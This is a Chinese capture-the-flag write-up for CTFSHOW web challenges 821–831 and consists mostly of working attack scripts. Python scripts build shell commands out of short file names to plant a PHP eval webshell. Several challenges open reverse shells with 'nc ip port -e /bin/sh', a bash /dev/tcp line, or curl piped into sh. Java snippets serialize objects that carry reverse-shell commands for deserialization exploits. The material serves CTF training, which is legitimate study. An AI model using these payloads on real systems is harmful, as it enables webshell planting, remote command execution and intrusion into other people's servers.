CTFSHOW 常用姿势篇(821-831)
Posted yu22x
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CTFSHOW 常用姿势篇(821-831)相关的知识,希望对你有一定的参考价值。
文章目录
这一部分我就是一个脚本搬运工了。
web821
可以看下这篇文章
https://www.cnblogs.com/-chenxs/p/11981586.html
这种限制长度的可以通过将想要使用的命令作为文件名进行创建,接着按时间排序写入到另一个文件中ls -t >0
最后执行0即可sh 0
用下群主在vip群发的脚本
import requests
import time
url = "http://ddfe46fa-fa05-4675-bb00-537e95a0f936.challenge.ctf.show/"
payload=[
">hp",
">1.p\\\\",
">d\\\\>\\\\",
">\\\\ -\\\\",
">e64\\\\",
">bas\\\\",
">7\\\\|\\\\",
">XSk\\\\",
">Fsx\\\\",
">dFV\\\\",
">kX0\\\\",
">bCg\\\\",
">XZh\\\\",
">AgZ\\\\",
">waH\\\\",
">PD9\\\\",
">o\\\\ \\\\",
">ech\\\\",
"ls -t>0",
". 0"
]
def writeFile(payload):
data=
"cmd":payload
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()
写入的文件内容为<?php eval($_GET[1]);
web822
web目录不可写,所以将文件写入到临时文件中,然后执行该文件。
不过在无数字字母中有种方法可以在这个地方使用。
#coding:utf-8
#author yu22x
import requests
url="http://dbea52c2-0b83-4770-972d-7adde3dc1677.challenge.ctf.show/"
#files='file':'bash -i >& /dev/tcp/ip/port 0>&1'
files='file':'nc ip port -e /bin/sh'
r= requests.post(url,files=files,data='cmd':'. /t*/*')
html = r.text
print(html)
bash反弹没成功用的nc反弹。
web 823|824
不得不佩服群主的脑洞
首先看下payload
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
写入grep h
接着执行* > j
实际执行的是grep h index.php
得到的是index.php所有带h的行,结果如下
<?php
# @Author: h1xa
# @Last Modified by: h1xa
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
highlight_file(__FILE__);
shell_exec($cmd);
接着将j中的内容添加到index.php后面并且写入到i中
cat * >> i*
最后将i的copy到index.php中。
不过适用的情况不多,需要最终调用的命令带h或者p。
# @Author: h1xa
import requests
import time
url = "http://6763f093-a4c6-48a8-9740-018b234da289.challenge.ctf.show/"
payload=[
">grep",
">h",
"*>j",
"rm g*",
"rm h*",
">cat",
"*>>i",
"rm c*",
"rm j",
">cp",
"*"
]
def writeFile(payload):
data=
"cmd":payload
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.3)
print("[*] Attack success!!!Webshell is "+url)
def main():
run()
if __name__ == '__main__':
main()
web825
原理类似于821,不过因为长度短了会出现相同的文件名,比如空格,可能会有多个地方使用,但是只会生成一个。
所以需要把空格改成$IFS。最后还有一个问题,我们之前用的ls -t>0长度超过了5所以得想个其他方法。
这里用的是利用dir,
dir a b >c 会将ab写入到c文件中。
具体原理可参考https://www.sohu.com/a/208155480_354899
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:42
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://eb893c73-86c3-449f-98fe-0f82d9212110.challenge.ctf.show/"
payload = [
'>sl',
'>kt-',
'>j\\\\>',
'>j\\\\#',
'>dir',
'*>v',
'>rev',
'*v>x',
'>php',
'>a.\\\\',
'>\\\\>\\\\',
'>-d\\\\',
'>\\\\ \\\\',
'>64\\\\',
'>se\\\\',
'>ba\\\\',
'>\\\\|\\\\',
'>4=\\\\',
'>Pz\\\\',
'>k7\\\\',
'>XS\\\\',
'>sx\\\\',
'>VF\\\\',
'>dF\\\\',
'>X0\\\\',
'>gk\\\\',
'>bC\\\\',
'>Zh\\\\',
'>ZX\\\\',
'>Ag\\\\',
'>aH\\\\',
'>9w\\\\',
'>PD\\\\',
'>S\\\\',
'>IF\\\\',
'>\\\\',
'>\\\\$\\\\',
'>ho\\\\',
'>ec\\\\',
'sh x',
'sh j'
]
def writeFile(payload):
data=
"cmd":payload
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(0.3)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web826
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:55:58
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://d6373b16-848d-4656-9a30-d1fbb18d8678.challenge.ctf.show/"
#url="http://101.34.94.44/aaa/index.php"
payload = [
'>\\\\ \\\\',
'>-t\\\\',
'>\\\\>a',
'>ls\\\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
#这个地方的ip是用的10进制,因为用普通的ip地址存在多个点号。
#可以用这个网站转https://tool.520101.com/wangluo/jinzhizhuanhuan/
'>sh',
'>\\\\|\\\\',
'>00\\\\',
'>80\\\\',
'>\\\\:\\\\',
'>48\\\\',
'>11\\\\',
'>75\\\\',
'>96\\\\',
'>16\\\\',
'>\\\\ \\\\',
'>rl\\\\',
'>cu\\\\',
'sh z',
'sh a',
]
def writeFile(payload):
data=
"cmd":payload
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"1.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"1.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web827
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2022-05-06 13:25:41
# @Last Modified by: h1xa
# @Last Modified time: 2022-05-10 20:56:17
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
import requests
import time
url = "http://ab1290cc-c3f0-4ff2-b864-a4388d4331a6.challenge.ctf.show/"
payload = [
'>\\\\ \\\\',
'>-t\\\\',
'>\\\\>a',
'>ls\\\\',
'ls>v',
'>mv',
'>vt',
'*v*',
'>ls',
'l*>t',
'>cat',
'*t>z',
'>php',
'>a.\\\\',
'>\\\\>\\\\',
'>-d\\\\',
'>\\\\ \\\\',
'>64\\\\',
'>se\\\\',
'>ba\\\\',
'>\\\\|\\\\',
'>4=\\\\',
'>Pz\\\\',
'>k7\\\\',
'>XS\\\\',
'>sx\\\\',
'>VF\\\\',
'>dF\\\\',
'>X0\\\\',
'>gk\\\\',
'>bC\\\\',
'>Zh\\\\',
'>ZX\\\\',
'>Ag\\\\',
'>aH\\\\',
'>9w\\\\',
'>PD\\\\',
'>S\\\\',
'>IF\\\\',
'>\\\\',
'>\\\\$\\\\',
'>ho\\\\',
'>ec\\\\',
'sh z',
'sh a'
]
def writeFile(payload):
data=
"cmd":payload
requests.post(url,data=data)
def run():
for p in payload:
writeFile(p.strip())
print("[*] create "+p.strip())
time.sleep(1)
def check():
response = requests.get(url+"a.php")
if response.status_code == requests.codes.ok:
print("[*] Attack success!!!Webshell is "+url+"a.php")
def main():
run()
check()
if __name__ == '__main__':
main()
web828
网上有现成的payload
https://juejin.cn/post/7069307571483443231
web829
User user = new User("nc ip port /bin/sh"); //不知道为啥bash不行
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++)
System.out.print((char)userData[x]);
传参的时候记得url编码
web830
exec漏洞点在BaseUser中,但是User类继承了BaseUser,所以我们可以通过User类给secret参数赋值。
User user = new User("123");
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++)
System.out.print((char)userData[x]);
不过也可以直接通过实例化BaseUser直接给secert赋值
BaseUser user = new BaseUser();
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++)
System.out.print((char)userData[x]);
web831
加了个过滤,不允许序列化User类,所以直接用830中的第二种方法就可以了
BaseUser user = new BaseUser();
user.secret="nc ip port -e /bin/sh";
byte[] bytes = null;
ByteArrayOutputStream bo = new ByteArrayOutputStream();
ObjectOutputStream oo = new ObjectOutputStream(bo);
oo.writeObject(user);
bytes = bo.toByteArray();
bo.close();
oo.close();
byte[] userData = Base64.getEncoder().encode(bytes);
for(int x= 0 ; x < userData.length; x++)
System.out.print((char)userData[x]);
以上是关于CTFSHOW 常用姿势篇(821-831)的主要内容,如果未能解决你的问题,请参考以下文章